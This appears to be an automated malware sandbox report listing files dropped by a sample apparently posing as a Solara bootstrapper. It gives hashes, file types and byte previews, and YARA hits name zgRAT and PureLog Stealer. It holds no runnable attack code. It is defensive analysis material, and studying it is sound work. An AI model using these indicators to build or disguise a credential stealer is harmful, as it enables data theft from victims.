                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with very long lines (943), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):943
                                                    Entropy (8bit):5.9146581571923695
                                                    Encrypted:false
                                                    SSDEEP:24:JkIdkR6gDhOirUj7fOvjVTcjxiK4PchfwVqfl+MP:i4oOirc7fObVojF40hfuI9P
                                                    MD5:B5B6B7412814E048B8FA1B3BEB408C0E
                                                    SHA1:5DA711044B81651743CC2534399390A8DEDD6D7C
                                                    SHA-256:1EEB46B9B64C51B5E93CD36178BD9DBC3DCB9795BEE78B486B7AC9F1E96E47D1
                                                    SHA-512:07D90A8E4A63E403843438ACDDC2E2683B102385F4DBC7266A55ADA5590EE22865B3313EF105BC5A8D31E90A156B9B8756630AEA174947785FA7B310403601F1
                                                    Malicious:false
                                                    Preview:yIG0H1Oa6Iuv5tDwLjjgBn11I3vrbBNZHb6PyEmrRGF2i5ropmx2oM4KQPsNFg955Voexx7G72O5i8SMLHCyNVv4gv8jWYlvGJ7NRN11pr4v89mS7fB8eKrjkt7ByYtiQdzYAF58PKJga96hIql1WnQ5cXmhP0CQ7WffKOR2jDtTALIkxa2Iw2LnM36mcYsYH3iEdaX4YtRS464QPCtz74eFK2SQSpZLVULHnEGWD8tDk2sP8pXao3bNYd3lIGltTG7kvxnK5Xv9KbfSJCSmR9hc28sKLfO7WAtd5IeLCMeQHbC77kbFy8bTjfrwEc9ZJymKrBXBiGkEeQUa5uMkDIIXiZ4ZbrGjNFHTz2Q6NagrYXzSKQ1TQZVApOlSG7k1AA1ZJBlDePWnmb9LkmOK0xTytGnkQ70P0prXgZIJpyyACsYOPasesZBMrDpCXAwgZHx6uloKdFfB8SvBsZV0PWgaoeqduGvoBRl54cenvhAn49OYRoU8p5RDkXSP5LaXT19qr0HQ5rFsV3goQRLFvw8GAiUhJOsjHnTD9hrbhED70jrq1n9n9Ulh23pIfjGq9fkskdptjuirsBPb0oqgPEjwCwKF1j578X8V89GY7PEPv3y1nOR13jb45yqySj1AyltVC4d1hRi9AUBI7TcmREDY5DaKTSFYYDaKKcytvaTlBb4kxh09HOsuhUa8eTiPMKl6407fes11ubXdJzXvbGQJUpm0CzPc1DZ007q6kUeYW19G66zo5xxF3bmOOGdodZ9rCgnMJaKHl2wdqg3GAkgEQT7ZVbrd1z572SDaSmffmqeBoIisNWo234asiN1rsrPv6zlXccxXFBcjz6uM39PeLDD71V1Fvxw4bsEzhKPujQx2c12mdpytbuk2vngHlsmROhIH15ottf55QLeAcPlG9CcqIMD3oIJ1ofn4svuhAF9
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1920000
                                                    Entropy (8bit):7.535182328864218
                                                    Encrypted:false
                                                    SSDEEP:24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
                                                    MD5:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    SHA1:D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
                                                    SHA-256:DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
                                                    SHA-512:5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):1.2326161723389917
                                                    Encrypted:false
                                                    SSDEEP:192:375PnNFsGYr0bU9+dQdaWBkl8vAEZizuiFJZ24lO8k:9vsGnbG+dQdamqehZizuiFJY4lO8k
                                                    MD5:EE4584F4EB4282D80AB3CEA91C75D8E3
                                                    SHA1:24161A8E61F1F3A714BC2F8925BC1139BD09C01C
                                                    SHA-256:AE2CB1FCA39207C25AF7F8C9264E752D28B680A3F1C8A238139A1F36D54FD3FF
                                                    SHA-512:11C552136535CC12844649F8D39D5AE72848B6E2168CFB2B69AA331D9E0EF58BDE65D1B271DEC7FE13D0F0E6F8B36EF121EE8187C393E106FE67FECBAF6774A8
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.0.7.8.4.7.3.3.0.2.5.1.4.2.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.0.7.8.4.7.3.5.3.3.7.6.3.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.8.a.3.c.4.5.-.9.5.8.7.-.4.6.c.0.-.b.8.f.2.-.b.7.c.4.3.6.a.1.6.6.c.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.5.8.8.1.c.e.-.6.2.a.a.-.4.e.4.7.-.b.e.6.6.-.2.5.3.b.9.b.b.b.f.e.4.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r.V.1...1.9...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.f.0.-.0.0.0.1.-.0.0.1.4.-.5.d.2.f.-.f.d.2.0.9.4.0.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.e.2.7.e.f.f.4.c.d.4.d.3.8.3.f.5.c.5.6.4.c.c.e.2.b.d.1.a.a.a.2.f.f.e.4.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:Mini DuMP crash report, 16 streams, Sat Sep 14 10:52:14 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):601300
                                                    Entropy (8bit):3.159398610180954
                                                    Encrypted:false
                                                    SSDEEP:3072:CjmUUsPJLp3+vFKENg6oVmfyBOXpIymdSZb8bE2AvaU4sCDYGaPPPCjcSAsO6wRJ:CjmUUsPFp3QwCgdbE2kHvjXq3XsqqTb
                                                    MD5:226A3818227C7393C947767ED14312C7
                                                    SHA1:47A5CB55C26FB4500FDA9CBC5E1836A21D5BD95D
                                                    SHA-256:597DB8B7BFF87AD95699EE4CE8509378C3A0F3F8088E9246215DCA05179F1D5A
                                                    SHA-512:4260B3B59E547CD69CF1E60009F4F73F378D9E13DCC1363217835068643BB845C0F424954586F4C480DF0A7E9DCC8764E20BE2F216FF34E7F9329E81D9A79B9D
                                                    Malicious:false
                                                    Preview:MDMP..a..... ........j.f............d...........d...........<....(....... ..$).......X.............l.......8...........T............U...............I...........K..............................................................................eJ......0L......Lw......................T............j.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6816
                                                    Entropy (8bit):3.7230816658623818
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJMPoUSj1YZj8Qpr489boPkfYAYm:R6lXJEZSxYtjocfV
                                                    MD5:9D29F85C7377A73ED3501EC015D41936
                                                    SHA1:2466B15824970C8209B67AA957626A03329694BC
                                                    SHA-256:EFD5153BBDFAC170351F7E7A8873A4FB866D7F4D3987D0B984DE879C3E930C69
                                                    SHA-512:29806D0F875A5A99F37875EE9609EA087462A682C9814F4A8E48D2E935F327E937D628F70BA52CAFF23BE86B4E356B6D27E7CDDCC31702B0B825150C2E797B8D
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.5.2.<./.P.i.
                                                    Process:C:\Windows\System32\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4834
                                                    Entropy (8bit):4.467367541101133
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zs8Jg771I9SFWpW8VYOYm8M4JM/F9yq8vyXdew0Ud:uIjf6I7F07VGJ+WSeFUd
                                                    MD5:C59DA08570D6CE16E91132CCDC30D7A1
                                                    SHA1:CF19C1631C513405AD2398AE825B7551DC661DE3
                                                    SHA-256:30B6E480DC5C892771974195CA81AD37F575B4091B44EFCCF80033A1BF4507C1
                                                    SHA-512:7D74428F706F0A6051C1C2EACBC050F3B70351F4EC72CA10B5C8AF4A1828A4981DB31ABD855D1FF40AE976BB3925C86CC6853C30836AFA3C20A535DF41D5933A
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="499794" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with very long lines (459), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):459
                                                    Entropy (8bit):5.855347794279777
                                                    Encrypted:false
                                                    SSDEEP:12:bdaPr5ORFQ4vkcxUch3tLaDQGWSLHnuirKL/4WbR1RoJKcEA:bMdORFQ4vphJIQ5Sjn/KR1RHcEA
                                                    MD5:F833CEFD21034CE83EABE9CB82330470
                                                    SHA1:E45F1F48B6AE610AC10F77B3970CA722B46756C1
                                                    SHA-256:6D3582828EF717F66080BD344E0D39316C95A36BD510671103DC50A24BF7C01F
                                                    SHA-512:3D452DB6886986A180EC2BE63D973CA52B4E173339E45111E12223A082C96FD27C6DF3A0BEA044EC4AFE38969781C8B651B4B026A36824CB1657DACD1901D129
                                                    Malicious:false
                                                    Preview:2ML9iZiYurrnL5eTzUCWJu2tCkEnlsPfQqb7xQzmN79D1VXMGAaQQkSITc77V4wCbLWedgfieaILuz1rN1hlR8OqXTnVT2QSL7lp82sje1w0bHXelQudXLud6qHJ3KPlJ0AxNLsUJ7HaMYOQ5IuDIx49MItRviqTlKqlGjRZhZUZETQic0NuaMdW5AlFcbikRxzCsnJW1Ufsdf521Lz4U53YqUpG8L7F0tHQeOzyr12Fqu2aEsNRlnPW3aVX8CXqXa2tXpYnVBNdCyr5bPCQ7pdMdvWD2c0oeMrQ2ICZTk6kawTFsZ5sAHsr6pQmSVv2Ki80GbDTNm6Xt3wrbQUcgHoWe9UN2ZG8zDa1xd9RWmfXKU8D3iLBBSWD4lWGGzayg8iqc438RCF4mQMJBRUTOF6grX7LH3LgLr1LwRk8pNu8McanZMEyfHjaBB9F6r0Y1js5ZAWtrVo
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1920000
                                                    Entropy (8bit):7.535182328864218
                                                    Encrypted:false
                                                    SSDEEP:24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
                                                    MD5:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    SHA1:D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
                                                    SHA-256:DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
                                                    SHA-512:5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with very long lines (979), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):979
                                                    Entropy (8bit):5.913555171005253
                                                    Encrypted:false
                                                    SSDEEP:24:mXDwk8sBCNSAmVP7ZDw3b4+xaaTEtP80M3wwcnb:mMk87SPR+0+xP+U0KwVb
                                                    MD5:4345AE6E0AE982FACD94D118A6CFC5BE
                                                    SHA1:711017F2A32123D7B95588FD87924CEFA808FD7D
                                                    SHA-256:985E694C6D8490A37FA1B75282BCC12767CAB450D79218C9ABE3CDB50CC26C2B
                                                    SHA-512:8D746214818C45D73EC2A5865C69D545615341800B84367B1850DF5C290DFB087AA7861F1B759181A0118BE2FC896420AB3015F1597315A7EF39BA0C8284318E
                                                    Malicious:false
                                                    Preview:tl4kgscL1MEnFLztPwmvcJdsd9lz3tcgfNGFhSKJQBQno31hctgeoQgkHMGgHmSIthI1EuL6mcfa20EkIDXJM82Prg7VMoCnsI3GuAdshj2LuGrRIfYDPI5up2Jiwzu8a1ru670HkomnGqelypNrP8YkMIb1045rz4v2Y6UKpRdkgSo8YitGmCscdHhyf8Qqt4xM5lM2VCC8fxE4ecdSKyFxLSZRYgpqAx0mecDwW1vjAu7qDmTCe8f5yAAmM5dyXV7r6bZBYq6SCgwbVsNvMmLCR5xebbkaX6LpwPtlMRoyBM2RNjQdrrmvJ5aAo5k6Ff4GUHoF8mi47XAFDfR2LGtqUaf1zs6RrrsgRv7F4KeEIrxv4U7Inrv9wOw4lxQQpRNQoexRiL7Alohmmt7evyn95ttD9CeH4OZ1egHahpkctvXIrJS10vf1nNV5uuRgr0GXOpIFmh6FNLPKVlV0umRIthOQLLpxYEv3oA3BAMPSyZnc7KjIYavEj8nrb14a1JrJZWfVsU0hX8TT4wTAmhY7SqTqWMkISybpsdCkpOaEkNrloTwpi3yUut1tDy8gtrPigolatsVYGUWE8rCCZ5jY9H48mSh0P4U28IFAsW50haNaXwuVw6GyI0jYtmyaKeJM9dGzmBUD9s1j3dlziMDTxguHjqQGhfqDRBb3q5svlDzZ99ePA927bzYds9Q6uNfeCyS2CrJmdSruqVHjLAFimslbm7KqpwAYhVWLrmNSzPeIIowX1qvuI71UM1QEhc7rSTMV861jxwsWOcS8Lxz8BQPkdC90WIvWRw0zbaY5yL6VOeGtiS3tn9qCDm166BNoAWEbmdguZ3JzT3V86QSDPCtSGywzjc8x8RV2ZoGFvIUuz0sJQ39qsJZ8nwUxrqL64W0BidjRJNSGs8cPFmipcSEz2XPnUTYE7XzdArkwTshf0TPoTEsEIfemRAJLO570yNIUJ9PYBvWuui8
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1920000
                                                    Entropy (8bit):7.535182328864218
                                                    Encrypted:false
                                                    SSDEEP:24576:4hNXfa1eVzqP3FsO+F8obr53uRdZvAADFrO0mtbnD6d5xknbg5bUEKUXOEbDzkaS:4+U5kzXDFrO0iTb0bzveEX99
                                                    MD5:3C3B7D5864E9F151A77B33D4B9D15E3C
                                                    SHA1:D8A0C81C551DA2C1E500EB2B56562A2AC0BE2C81
                                                    SHA-256:DE07619885CBD439FA402A13CEDF8EDF1D67B2AE4FB078F8DC18AE7A662A7D23
                                                    SHA-512:5204B39F1008093E95221B9A7EA14BE6BBA59A5A47D0447CFDC503C524FEF9AA4001785AC0CD333F19817B6D428E2034772F6134BC84493A74F47CCA2672D642
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\RuntimeBroker.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.f.................D...........b... ........@.. ....................................@..................................a..K....... ............................................................................ ............... ..H............text...$B... ...D.................. ..`.rsrc... ............F..............@....reloc...............J..............@..B.................b......H............................x..Ea.......................................0..........(.... ........8........E....)...9...8.......8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0..)....... ........8........E............F...........o...8........~....(s...~....(w... ....<.... ....~....{....9....& ....8....~....:.... ....~....{....9....& ....8t...~....(k... .... .... ....s....~....(o....... ....~....{....:4...& ....8)...8:... ....8
                                                    Process:C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1396
                                                    Entropy (8bit):5.350961817021757
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:CSV text
                                                    Category:dropped
                                                    Size (bytes):847
                                                    Entropy (8bit):5.354334472896228
                                                    Encrypted:false
                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                    Malicious:false
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):19253
                                                    Entropy (8bit):5.005753878328145
                                                    Encrypted:false
                                                    SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                    MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                    SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                    SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                    SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                    Malicious:false
                                                    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:modified
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                    MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                    SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                    SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                    SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                    Malicious:false
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                    Category:dropped
                                                    Size (bytes):106496
                                                    Entropy (8bit):1.1358696453229276
                                                    Encrypted:false
                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
